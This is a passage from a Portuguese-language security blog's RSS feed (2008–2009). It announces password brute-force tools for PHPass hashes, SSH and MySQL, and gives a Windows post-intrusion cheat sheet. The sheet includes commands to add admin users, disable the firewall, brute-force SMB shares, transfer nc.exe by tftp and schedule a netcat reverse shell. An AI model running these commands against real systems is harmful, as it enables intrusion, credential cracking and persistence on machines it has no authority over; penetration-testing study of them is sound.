Posted in Article  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/187/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/187/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/187/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=187&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/02/04/yet-another-brute-force-tool-mysql/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/02/smashed.png" medium="image">
			<media:title type="html">smashed</media:title>
		</media:content>
	</item>
		<item>
		<title>PHPass hash brute forcer</title>
		<link>http://ulissescastro.wordpress.com/2009/01/29/phpass-hash-brute-forcer/</link>
		<comments>http://ulissescastro.wordpress.com/2009/01/29/phpass-hash-brute-forcer/#comments</comments>
		<pubDate>Thu, 29 Jan 2009 22:45:30 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=176</guid>
		<description><![CDATA[Ae! Mais algumas brincadeiras com python&#8230; inspirado neste post e em outras situações&#8230; ;)

 
 
 
 
 
 
 
 
 
 

PHPass hash brute forcer (phpassbrute.py) [download] 
- PHPass hash brute forcer. This cracker works against any hash created by this framework to encrypt and store hashed passwords. Such projects that use it include WordPress, Drupal, bbPress, phpBB3, and many others.
 
Special thanks to Alexander Chemeris for [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=176&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Ae! Mais algumas brincadeiras com python&#8230; inspirado neste <a href="http://forum.darkc0de.com/index.php?action=vthread&amp;forum=10&amp;topic=7750" target="_blank">post</a> e em outras situações&#8230; ;)<br />
<img class="alignleft size-full wp-image-179" title="spaceball" src="http://ulissescastro.files.wordpress.com/2009/01/spaceball.png?w=497&#038;h=330" alt="spaceball" width="497" height="330" /><br />
 </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> <br />
<strong></strong></p>
<p><strong>PHPass hash brute forcer (phpassbrute.py) [<a href="http://packetstormsecurity.org/filedesc/phpassbrute.py.txt.html" target="_blank">download</a>] </strong></p>
<p>- PHPass hash brute forcer. This cracker works against any hash created by this framework to encrypt and store hashed passwords. Such projects that use it include WordPress, Drupal, bbPress, phpBB3, and many others.</p>
<p> </p>
<p>Special thanks to Alexander Chemeris for having made available the <a href="http://www.openwall.com/phpass/" target="_blank">module phpass</a> and inspired me.</p>
<p> </p>
<p>Para quem não conhece e quer saber mais sobre o framework utilizado por diversos projetos em PHP para guardar suas senhas neste <a href="http://freshmeat.net/projects/phpass/" target="_blank">link</a> mais infos.</p>
<p>Como utilizar? Abaixo um exemplo:</p>
<p><code>$ ./phpassbrute.py -w wordlist.txt <br />
[*] phpass hash brute force tool (by thebug)<br />
[*] hash prefix: $P$<br />
[*] paste hash here: $P$B0nVOEAGGTyJJsQhZyLxS3hyzAhgUa1<br />
[*] 3107 word(s) loaded.<br />
[*] brute force started.</code></p>
<p><code> </code></p>
<p><code>[*] got it!<br />
[*] password is: 123456<br />
</code><br />
 É isso ae&#8230; enjoy! ;)</p>
<p>obs: Special thanks to Wagner Elias, &#8220;The Lowyer&#8221;.</p>
Posted in Article  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/176/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/176/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/176/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/176/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/176/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/176/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/176/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/176/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/176/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/176/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=176&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/01/29/phpass-hash-brute-forcer/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/01/spaceball.png" medium="image">
			<media:title type="html">spaceball</media:title>
		</media:content>
	</item>
		<item>
		<title>LAPP Security Enhanced Linux</title>
		<link>http://ulissescastro.wordpress.com/2009/01/21/lapp-security-enhanced-linux/</link>
		<comments>http://ulissescastro.wordpress.com/2009/01/21/lapp-security-enhanced-linux/#comments</comments>
		<pubDate>Wed, 21 Jan 2009 13:29:31 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=167</guid>
		<description><![CDATA[Está disponível as palestras do Kaigai Kohei sobre SE PostgreSQL e LAPP/SELinux que foi relizada na linux.conf.au idéia foi lançada por ele próprio há algum tempo na lista e pelo visto está evoluindo muito bem!
Pra quem não tem muita intimidade com acrônimos LAPP é uma alterntiva ao famoso LAMP (Linux, Apache, MySQL, (PHP&#124;Python&#124;Perl)) utilizado por inúmeros sites [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=167&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Está disponível as palestras do <a href="http://kaigai.sblo.jp/article/25716638.html">Kaigai Kohei</a> sobre <a href="http://sepgsql.googlecode.com/files/LCA20090119-sepgsql.pdf">SE PostgreSQL</a> e <a href="http://sepgsql.googlecode.com/files/LCA20090120-lapp-selinux.pdf">LAPP/SELinux</a> que foi relizada na <a href="http://linux.conf.au/programme/schedule/">linux.conf.au</a> idéia foi lançada por ele próprio <a href="http://marc.info/?l=selinux&amp;m=121611666013230&amp;w=2" target="_blank">há algum tempo na lista</a> e pelo visto está evoluindo muito bem!</p>
<p>Pra quem não tem muita intimidade com acrônimos LAPP é uma alterntiva ao famoso LAMP (Linux, Apache, MySQL, (PHP|Python|Perl)) utilizado por inúmeros sites ao redor do mundo, no caso do LAPP seria (Linux, Apache, PostgreSQL, (PHP|Python|Perl)).</p>
<p>Recomendo fortemente a leitura das duas palestras realizadas, principalmente a sobre LAPP/SELinux, pois promete revolucionar em termos de hardening em ambiente de aplicações web.</p>
<p>Abaixo um gráfico demonstrando o status do projeto e uma idéia do objetivo do projeto.</p>
<p><img class="alignleft size-full wp-image-168" title="LAPPSELinux" src="http://ulissescastro.files.wordpress.com/2009/01/080719_lapp.png?w=512&#038;h=251" alt="LAPPSELinux" width="512" height="251" /></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p>Enjoy! ;)</p>
Posted in Article Tagged: Hardening, Security, SELinux <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/167/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/167/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/167/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=167&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/01/21/lapp-security-enhanced-linux/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/01/080719_lapp.png" medium="image">
			<media:title type="html">LAPPSELinux</media:title>
		</media:content>
	</item>
		<item>
		<title>Multi Thread SSH Brute Force</title>
		<link>http://ulissescastro.wordpress.com/2009/01/17/multi-thread-ssh-brute-force/</link>
		<comments>http://ulissescastro.wordpress.com/2009/01/17/multi-thread-ssh-brute-force/#comments</comments>
		<pubDate>Sat, 17 Jan 2009 18:56:58 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=156</guid>
		<description><![CDATA[Ok, eu sei que isso é praticamente a re-re-re-re-re-RE-re-re-invenção da roda, mas eu não aguentei&#8230; em um momento de falta de criatividade ou por necessidade pois o módulo ssh do hydra e nem medusa rodaram no meu note como deveria. E como estou numa fase de mergulho profundo em python resolvi escrever essa ferramenta, fiquem [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=156&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Ok, eu sei que isso é praticamente a re-re-re-re-re-RE-re-re-invenção da roda, mas eu não aguentei&#8230; em um momento de falta de criatividade ou por necessidade pois o módulo ssh do hydra e nem medusa rodaram no meu note como deveria. E como estou numa fase de mergulho profundo em python resolvi escrever essa ferramenta, fiquem a vontade para usar, modificar, distribuir&#8230; etc.. :)</p>
<p><img class="size-full wp-image-158 alignnone" title="bruteforce" src="http://ulissescastro.files.wordpress.com/2009/01/bruteforce.jpg?w=500&#038;h=333" alt="bruteforce" width="500" height="333" /></p>
<p> </p>
<p><strong>MT SSH Brute Force (mtsshbrute.py)</strong> [<a href="http://packetstormsecurity.org/filedesc/mtsshbrute.py.txt.html" target="_self">download</a>]</p>
<p>- Simple multi thread SSH brute force utility written in python using paramiko.</p>
<p><strong>Enjoy!</strong></p>
Posted in Article Tagged: Development, Hacking, Tools <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/156/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/156/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/156/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/156/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/156/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/156/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/156/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/156/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/156/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/156/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=156&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2009/01/17/multi-thread-ssh-brute-force/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2009/01/bruteforce.jpg" medium="image">
			<media:title type="html">bruteforce</media:title>
		</media:content>
	</item>
		<item>
		<title>Windows Command Line for Pentesters</title>
		<link>http://ulissescastro.wordpress.com/2008/12/08/windows-command-line-for-pentesters/</link>
		<comments>http://ulissescastro.wordpress.com/2008/12/08/windows-command-line-for-pentesters/#comments</comments>
		<pubDate>Mon, 08 Dec 2008 04:09:06 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=129</guid>
		<description><![CDATA[
Há tempos venho enrolando para publicar este post, se trata de um estudo que venho fazendo há tempos sobre comandos necessários ao conseguir uma &#8220;shell&#8221; no windows, e também comandos pós-intrusão, são algumas anotações que fiz ao longo dos anos portanto não espere nada de super ultra novo.
É comun em um teste de intrusão ter [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=129&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><img class="size-full wp-image-130 alignnone" title="swissarmyknife" src="http://ulissescastro.files.wordpress.com/2008/12/swissarmyknife.jpg?w=500&#038;h=375" alt="swissarmyknife" width="500" height="375" /></p>
<p>Há tempos venho enrolando para publicar este post, se trata de um estudo que venho fazendo há tempos sobre comandos necessários ao conseguir uma &#8220;shell&#8221; no windows, e também comandos pós-intrusão, são algumas anotações que fiz ao longo dos anos portanto não espere nada de super ultra novo.</p>
<p>É comun em um teste de intrusão ter uma &#8220;shell&#8221; (cmd.exe) de uma máquina windows, sendo através de um ataque &#8220;client-side&#8221; ou através de execução remota de comandos (<a href="http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx">MS08-067</a>), ou até mesmo <a href="http://wagnerelias.com/2008/11/26/pen-test-by-adobe-or-office/">enviando arquivos maliciosos</a> por exemplo, a <a href="http://technet.microsoft.com/en-us/library/default.aspx">Microsoft disponibiliza praticamente tudo o que se precisa para sobreviver somente com a linha de comando</a>, porém quando precisa de algo rapidamente é complicado ir até lá e ficar lendo manual dos comandos, outro problema é que nem sempre temos a possibilidade de enviar uma ferramenta para o alvo comprometido e é nessa hora que é preciso saber manipular as ferramentas nativas do Windows, esses são os motivos que me levaram a criar esta &#8220;Cheat Sheet de Comandos para Windows&#8221;, abaixo vou listar cada comando e comentar cada um deles.</p>
<p> </p>
<p><strong>MANIPULANDO USUÁRIOS E GRUPOS</strong></p>
<p>Listar usuários:</p>
<p><strong>C:\&gt; net user</strong></p>
<p>Adicionar usuário:</p>
<p><strong>C:\&gt; net user joao senha123 /add</strong></p>
<p>Listar informações sobre um usuário:</p>
<p><strong>C:\&gt; net user joao</strong></p>
<p>Remover usuário:</p>
<p><strong>C:\&gt; net user joao /del</strong></p>
<p>Listar grupos:</p>
<p><strong>C:\&gt; net localgroup</strong></p>
<p>Adicionar usuário em um grupo:</p>
<p><strong>C:\&gt; net localgroup Administradores joao /add</strong></p>
<p>Adicionar usuário em um grupo:</p>
<p><strong>C:\&gt; net localgroup Administradores joao /del</strong></p>
<p> </p>
<p><strong>MANIPULANDO FIREWALL</strong></p>
<p>Listar regras do firwall:</p>
<p><strong>C:\&gt; netsh firewall show config</strong></p>
<p>Desabilitar firewall:</p>
<p><strong>C:\&gt; netsh firewall set opmode disable</strong></p>
<p>Habilitar firewall:</p>
<p><strong>C:\&gt; netsh firewall set opmode enable</strong></p>
<p>Criando regra, abrir portas:</p>
<p><strong>C:\&gt; netsh firewall add portopening TCP 80 NomeDoServico</strong></p>
<p>Fechar portas:</p>
<p><strong>C:\&gt; netsh firewall del portopening TCP 80</strong></p>
<p> </p>
<p><strong>COLETANDO INFORMAÇÕES</strong></p>
<p>Informações detalhadas sobre configuração de rede:</p>
<p><strong>C:\&gt; ipconfig /all</strong></p>
<p>Visualizar o cache do DNS:</p>
<p><strong>C:\&gt; ipconfig /displaydns</strong></p>
<p>Com isso é possivel descobrir quais foram os ultimos acesso feitos pela máquina, descobrindo possíveis hosts internos/externos, auxiliado na expansão.</p>
<p>Consultando tabela arp:</p>
<p><strong>C:\&gt; arp -a</strong></p>
<p>Descobrir outros hosts que a máquina se comunicou recentemente, uma maneira passiva de reconhecer a rede interna.</p>
<p>Verificar o nome da maquina:</p>
<p><strong>C:\&gt; hostname </strong></p>
<p>Serviços ativos e portas que estão &#8220;ouvindo&#8221;:</p>
<p><strong>C:\&gt; netstat -an</strong></p>
<p>Mostrando o ID do processo responsável pelo serviço:</p>
<p><strong>C:\&gt; netstat -anop tcp</strong></p>
<p>O máximo de detalhe possível sobre cada porta/processo responsável:</p>
<p><strong>C:\&gt; netstat -abnvp [protocolo]</strong></p>
<p>Verificando rotas:</p>
<p><strong>C:\&gt; netstat -nr</strong></p>
<p><strong>C:\&gt; route print</strong></p>
<p>Listar processos e pid&#8217;s:</p>
<p><strong>C:\&gt; tasklist</strong></p>
<p>Finalizando/&#8221;matando&#8221; processos por PID:</p>
<p><strong>C:\&gt; taskkill /pid [id]</strong></p>
<p>Forçando processos a finalizar por nome:</p>
<p><strong>C:\&gt; taskkill /f /im [nome]</strong></p>
<p>Finalizando processos por nome:</p>
<p><strong>C:\&gt; wmic process where name=&#8221;telnet.exe&#8221;</strong></p>
<p>O wmic tem uma infinidade de opções! </p>
<p>Terminar processos me lembrou de um post que li há um tempo atraz sobre <a href="http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html">como matar processos dos AV&#8217;s mais conhecidos utilizando um arquivo de word/excel com macro</a>, e a lista que o Blog fornece de nomes de executáveis de AV é excelente, somando com o &#8220;<strong>For /F</strong>&#8221; que mostro logo abaixo é possível aniquilar vários AV&#8217;s. :)</p>
<p>Listando serviços em funcionamento, seu estado e suas opções:</p>
<p><strong>C:\&gt; sc query</strong></p>
<p><strong>(&#8230;)</strong></p>
<p><img class="alignnone size-full wp-image-143" title="sq" src="http://ulissescastro.files.wordpress.com/2008/12/sq.jpeg?w=554&#038;h=204" alt="sq" width="554" height="204" /></p>
<p>(&#8230;)</p>
<p><strong>SERVICE_NAME</strong>, o nome do servico que usamos para enviar um sinal (stop, start, pause)</p>
<p><strong>DISPLAY_NAME</strong>, o nome que aparece lá na lista de serviço quando usamos a opção Meu Computador/Gerenciar/Serviços</p>
<p><strong>STATE</strong>, o estado atual do serviço (parado, em execuçao, &#8230;)</p>
<p>Uma linha abaixo de <strong>STATE</strong> vemos as opcoes de sinais que podemos enviar ao serviço.</p>
<p><strong>sc</strong> é um aplicativo, muito versátil pois além de suas funcionalidade é possível encontrá-lo em <a href="http://support.microsoft.com/kb/251192">qualquer versão do Windows</a>.</p>
<p> </p>
<p><strong>MANIPULADO COMPARTILHAMENTO SMB</strong></p>
<p>Estabelecer uma sessao SMB:</p>
<p><strong>C:\&gt; net use \\[IP/nome] [senha] /u:[usuario]</strong></p>
<p>É possível ter somente uma sessão estabelecida por vez, o Windows nao suporta mais de uma conexão via SMB.</p>
<p>Mapear pasta compartilhada no servidor alvo:</p>
<p><strong>C:\&gt; net use * \\[IP/nome]\[compartilhamento] [senha] /u:[usuário]</strong></p>
<p>O asterisco(<strong>*</strong>) significa que vai mapear o compartilhamento com a primeira letra disponível, no caso do Windows XP ele associa de forma inversa (<strong>Z:</strong>).</p>
<p>Finalizar sessão/mapeamento:</p>
<p><strong>C:\&gt; net use Z: /del</strong></p>
<p>Destruir TODOS os mapeamentos criados:</p>
<p><strong>C:\&gt; net use * /del /y</strong></p>
<p> </p>
<p><strong>UM POUCO SOBRE LOOPS, PROCESSAMENTO CONDICIONAL E OUTROS</strong></p>
<p>O &#8220;<strong>For</strong>&#8221; tem diversos &#8220;modos&#8221; e abaixo (/F), faz iteração somente com números:</p>
<p><strong>C:\for /L %i in ([start],[step],[stop]) do [comando]</strong></p>
<p>Contador de 1 a 255:</p>
<p><strong>C:\&gt; for /L %i in (1,1,255) do echo repetindo %i</strong></p>
<p>É imprescindível saber como fazer loop, principalmente quando precisamos criar scanners de rede/porta sem precisar instalar ferramentas no SO.</p>
<p>Loop infinito:</p>
<p><strong>C:\&gt; for /L %i in (,,) do echo loop infinito</strong></p>
<p>&#8220;<strong>Echo</strong>&#8221; do Windows, diferente dos *nix, não é preciso colocar aspas (&#8220;)</p>
<p>No windows não existe o comando sleep que encontramos nos *nix, para isso criamos um &#8220;workaround&#8221;:</p>
<p><strong>C:\&gt; ping -n (segundos-1) 127.0.0.1</strong></p>
<p>Exemplo, esperar 5 segundos:</p>
<p><strong>C:\&gt; ping -n 6 127.0.0.1</strong></p>
<p>Loop &#8220;<strong>For</strong>&#8221; mais elaborado</p>
<p><strong>C:\&gt; for /f ["opções"] %i in ([conteúdo]) do [comando]</strong></p>
<p>Sendo que conteúdo pode ser conteúdo de um arquivo, uma &#8220;string&#8221; ou a saída de um comando, ex:</p>
<p><strong>C:\&gt; for /f ["opções"] %i in (arquivo.txt) do [comando]</strong></p>
<p><strong>C:\&gt; for /f ["opções"] %i in (&#8220;string&#8221;) do [comando]</strong></p>
<p><strong>C:\&gt; for /f ["opções"] %i in (&#8216;comando&#8217;) do [comando]</strong></p>
<p>O &#8220;<strong>For</strong>&#8221; tem uma série de opções para ampliar suas funcionaliades, opções para delimitadores, pular iteração caso encontre determinada string e por ae vai, interessante ler o help do comando, para ter uma boa noção do que este comando é capaz.</p>
<p>Usando a força bruta para mapear uma unidade:</p>
<p><strong>for /F %i in (senhas.txt) do @net use * \\192.168.1.106\share %i /u:administrador 2&gt;nul &amp;&amp; echo senha: %i &amp;&amp; break</strong></p>
<p>Ao montar o compartilhamento, mostra na tela a senha e volta para o prompt.</p>
<p> </p>
<p><strong>OPERADORES LÓGICOS E REDIRECIONAMENTO</strong></p>
<p>Os operadores lógicos interpretados pelo cmd.exe são similares ao do *nix, com algumas diferenças como por exemplo o ponto e vírgula (;), no windows:</p>
<p><strong>C:\&gt; dir &amp; echo oi</strong></p>
<p>A interpretação pelo cmd.exe neste caso é exatamente igual do (;) do *nix, execute o primeiro comando e após execute o outro.</p>
<p>Execute o segundo somente se executar com sucesso (<strong>AND</strong>):</p>
<p><strong>C:\&gt; dir &amp;&amp; echo oi</strong></p>
<p>Execute o primeiro depois o segundo (<strong>OR</strong>):</p>
<p><strong>C:\&gt; oi || dir</strong></p>
<p>O windows também tem buraco negro! :-o</p>
<p><strong>C:\&gt; ping -n 2 ping 127.0.0.1 &gt;nul</strong></p>
<p>Faz com que toda saida do ping va para o além! Qualquer semelhança com &#8220;<strong>/dev/null</strong>&#8221; é mera coincidência. ;)</p>
<p>Redirecionar a saída de erros:</p>
<p><strong>C:\&gt; oi 2&gt; nul</strong></p>
<p>Gerar log de erros utilizando (<strong>&gt;&gt;</strong>) para adicionar ao final do arquivo.</p>
<p><strong>C:\&gt; oi 2&gt;&gt; error.log</strong></p>
<p>GREP no windows?</p>
<p>O &#8220;<strong>Find</strong>&#8221; no windows é praticamente igual ao grep do linux, um pouco mais simplório e pode ser usado das seguintes formas:</p>
<p><strong>C:\&gt; find &#8220;UP&#8221; scan.txt</strong></p>
<p>Procurando &#8220;string&#8221; dentro de todos os arquivos do diretório atual:</p>
<p><strong>C:\&gt; find /i &#8220;senha&#8221; *.*</strong></p>
<p><strong>/i</strong> para &#8220;case insensitive&#8221;, não diferencia maiúsculas de minúsculas.</p>
<p>Redirecionamento pipe (<strong>|</strong>):</p>
<p><strong>C:\&gt; type scan.txt | find &#8220;UP&#8221;</strong></p>
<p>Além do &#8220;Find&#8221; o windows tem também o &#8220;Findstr&#8221;, que esse sim é semelhante ao &#8220;egrep&#8221; pois utiliza expressões regulares.</p>
<p>Um exemplo simples onde procura pela palavra &#8220;senha&#8221; tanto maiúscula como minúscula recursivamente nos diretórios/subdiretórios subsequentes, mostrando somente o nome dos arquivos que concidirem com a busca e pulando os arquivos binários.</p>
<p><strong>C:\&gt; findstr /s /i /m /p &#8220;senha&#8221; *.*</strong></p>
<p>A única maneira que encontrei para fazer busca com mais de uma &#8220;string&#8221; como por exemplo como egrep do *nix:</p>
<p><strong># egrep &#8216;(ulisses|castro)&#8217; *</strong></p>
<p>É preciso primeiro criar um arquivo com uma string por linha:</p>
<p><strong>C:\&gt; copy con strings.txt</strong></p>
<p><strong>ulisses</strong></p>
<p><strong>castro</strong></p>
<p><strong>(Ctrl+z)+[ENTER]</strong></p>
<p>E então executar a busca com a opcão <strong>/g</strong>:</p>
<p><strong>C:\&gt; findstr /s /i /m /p /g:strings.txt *.*</strong></p>
<p> </p>
<p><strong>EDITANDO / CRIANDO ARQUIVOS</strong></p>
<p>Para criar um arquivo:</p>
<p><strong>C:\&gt; copy con [nomedoarquivo]</strong></p>
<p>Para finalizar ediçao <strong>Ctrl+Z e [ENTER]</strong></p>
<p>Para adicionar ao final do arquivo algum texto:</p>
<p><strong>C:\&gt; copy [nomedoarquivo] + con</strong></p>
<p><strong>Para finalizar ediçao Ctrl+Z e [ENTER]</strong></p>
<p> </p>
<p><strong>TRANSFERINDO/CRIANDO ARQUIVOS</strong></p>
<p>Enviando e criando arquivos no compartlhamento alvo:</p>
<p><strong>C:\&gt; echo testando &gt; \\[IP]\\[compartilhamento]\hello.txt</strong></p>
<p><strong>C:\&gt; type nc.exe &gt; \\[IP]\\[compartilhamento]\nc.exe</strong></p>
<p>O bom e velho tftp baixando arquivos:</p>
<p><strong>C:\&gt; tftp –I [IP] GET nc.exe</strong></p>
<p>Enviando arquivos com tftp:</p>
<p><strong>C:\&gt; tftp -i 192.168.1.107 PUT nc.exe</strong></p>
<p> </p>
<p><strong>AGENDAR TAREFAS</strong></p>
<p>Para que as tarefas possam ser agendadas o serviço &#8220;<strong>schedule</strong>&#8221; tem que estar em execução: </p>
<p><strong>C:\&gt; sc query schedule</strong></p>
<p>Iniciando o serviço:</p>
<p><strong>C:\&gt; sc start schedule</strong></p>
<p>Descobrindo a hora do servidor alvo:</p>
<p><strong>C:\&gt; net time \\[IP]</strong></p>
<p>Listando tarefas:</p>
<p><strong>C:\&gt; at</strong></p>
<p>Informações sobre determinada tarefa:</p>
<p><strong>C:\&gt; at [ID]</strong></p>
<p>Agendamento para desativar o firewall as 11:37pm:</p>
<p><strong>C:\&gt; at 11:37pm netsh firewall set opmode disable</strong></p>
<p>Agendando uma conexão reversa:</p>
<p><strong>C:\&gt; at 11:41pm c:\nc.exe -e cmd.exe -n 192.168.1.103 9999</strong></p>
<p>Agendando um download:</p>
<p><strong>C:\&gt; at \\127.0.0.1 2:45pm tftp –I 192.168.1.107 GET nc.exe</strong></p>
<p>Agendando um script:</p>
<p><strong>C:\&gt; at \\127.0.0.1 10:53pm cmd.exe /c c:\script.bat</strong></p>
<p>Repare que para executar qualquer coisa além de <strong>.exe</strong> , é necessário utilizar (<strong>cmd.exe /c</strong>).</p>
<p>Agendando um script e redirecionando sua saída para um arquivo:</p>
<p><strong>C:\&gt; at 23:23 c:\script2.bat ^&gt;c:\output.txt</strong></p>
